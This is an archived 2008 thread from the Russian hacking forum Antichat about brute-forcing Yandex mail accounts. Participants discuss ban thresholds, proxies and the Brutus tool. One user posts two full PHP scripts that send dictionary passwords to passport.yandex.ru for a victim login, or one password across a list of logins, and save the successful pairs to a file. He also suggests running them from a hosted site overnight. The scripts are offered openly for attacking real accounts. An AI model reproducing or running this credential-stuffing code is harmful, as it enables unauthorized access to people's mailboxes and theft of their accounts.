ANTICHAT

ANTICHAT (https://forum.antichat.io/index.php)
-   Уязвимости Mail-сервис (https://forum.antichat.io/forumdisplay.php?f=14)
-   -   Брут Яндекса (https://forum.antichat.io/showthread.php?t=64900)

diehard 20.03.2008 18:36

Брут Яндекса
 
Подскажите актуален ли сейчас брут почты @yandex.ru? Какие там ограничения? Банят?

Sated 20.03.2008 19:00

юзай брут от Whack`a

vp$ 20.03.2008 19:07

попробуй сам вручную перебрать 5 паролей, а потом задавай глупые вопросы, через pop3 банят после 300 попыток

Pernat1y 20.03.2008 22:52

да, банят быстро и на долго.
или запасайся пачкой прокси, или забей...

ZET36 21.03.2008 06:52

да актуален

если хочеш заюзай мой скрипт (нужны сокеты)

для брута одного логина несколькими паролями
PHP код:


<?php
$login
="логинжертвы"; 

$passfile = "pass.txt"; 
for (
$doscriot=0;$doscriot<=count($contents);$doscriot++) 
{
$passfile = "pass.txt";

$handle = fopen($passfile,"r");
$contents = fread($handle,filesize($passfile));
fclose($handle);
$contents = explode("\n",$contents);
$parol=trim($contents[$doscriot]);


$hostname = "passport.yandex.ru"; 
$path = "/passport"; 
$line = "";


$fp = fsockopen($hostname, 80, $errno, $errstr, 30); 

if (!
$fp) echo "$errstr ($errno)<br />\n"; 
else
{

$data = "mode=auth&login=".$login."&passwd=".$parol."&retpath=http://mail.yandex.ru\r\n\r\n"; 

$headers = "POST $path HTTP/1.1\r\n"; 
$headers .= "Host: $hostname\r\n";
$headers .= "Content-type: application/x-www-form-urlencoded\r\n";
$headers .= "Content-Length: ".strlen($data)."\r\n\r\n";

fwrite($fp, $headers.$data); 
while (!
feof($fp)) 
{
$line .= fgets($fp, 1024);
}
fclose($fp);
}

if(
$line[9]=="3")
{

$zergood = 'good.txt';
$somecontent = " для логина ".$login." пароль ".$parol;


if (
is_writable($zergood)) {


    if (!
$udacha = fopen($zergood, 'a')) {
         echo 
"Не могу открыть файл ($zergood)";
         exit;
    }


    if (
fwrite($udacha, $somecontent) === FALSE) {
        echo 
"Не могу произвести запись в файл ($zergood)";
        exit;
    }
    
    echo 
"Ура! сбручено ($somecontent) и записано в файл ($zergood)";
    
    
fclose($udacha);

} else {
    echo 
"Файл $zergood недоступен для записи";
}

}

}


?>

создаём ещё файлы good.txt куда запишется удачная комбинация

и файл pass.txt со словарём для брута (список паролей)
на все файлы права 777


для брута одним паролем на несколько логинов
PHP код:

<?php
$parol
="пароль"; 

$loginsfile = "login.txt"; 
for (
$doscriot=0;$doscriot<=count($contents);$doscriot++) 
{
$loginsfile = "login.txt";

$handle = fopen($loginsfile,"r");
$contents = fread($handle,filesize($loginsfile));
fclose($handle);
$contents = explode("\n",$contents);
$loginsss=trim($contents[$doscriot]);


$hostname = "passport.yandex.ru"; 
$path = "/passport"; 
$line = "";


$fp = fsockopen($hostname, 80, $errno, $errstr, 30); 

if (!
$fp) echo "$errstr ($errno)<br />\n"; 
else
{

$data = "mode=auth&login=".$loginsss."&passwd=".$parol."&retpath=http://mail.yandex.ru\r\n\r\n"; 

$headers = "POST $path HTTP/1.1\r\n"; 
$headers .= "Host: $hostname\r\n";
$headers .= "Content-type: application/x-www-form-urlencoded\r\n";
$headers .= "Content-Length: ".strlen($data)."\r\n\r\n";

fwrite($fp, $headers.$data); 
while (!
feof($fp)) 
{
$line .= fgets($fp, 1024);
}
fclose($fp);
}

if(
$line[9]=="3")
{

$zergood = 'good.txt';
$somecontent = " у  пароля ".$parol." логин ".$loginsss;


if (
is_writable($zergood)) {


    if (!
$udacha = fopen($zergood, 'a')) {
         echo 
"Не могу открыть файл ($zergood)";
         exit;
    }


    if (
fwrite($udacha, $somecontent) === FALSE) {
        echo 
"Не могу произвести запись в файл ($zergood)";
        exit;
    }
    
    echo 
"Ура! сбручено ($somecontent) и записано в файл ($zergood)";
    
    
fclose($udacha);

} else {
    echo 
"Файл $zergood недоступен для записи";
}

}

}


?>


создаём ещё файлы good.txt куда запишется удачные комбинации

и файл login.txt со словарём для брута (список логинов)
на все файлы права 777

URB-VOLK 21.03.2008 09:03

Хороший скрипт)

CRL 22.03.2008 20:04

Хм. У меня в Брутусе скорость от 700pps на яндексе. Правда бан потом идет, но словарик 3000-5000 паролей отлично проходит. Меня кончно немного поражает скорость такая, но пароль все равно находится валидный.

ZET36 23.03.2008 00:42

Цитата:

Сообщение от urb-volk
Хороший скрипт)

а главное что свой трафик тратить ненужно. залил на сайт запустил скрипт выключил комп лёг спать и твой домен всё за тебя сделает. а на завтро смотриш на сайте уже удачные комбинации. помоему рализация брутеров на пхп стоящее занятие

URB-VOLK 23.03.2008 21:30

Надо будит испытать как ты сказал + тебе в репу)

Timati 23.03.2008 21:31

ТС , ДА актуалеен!


Время: 09:49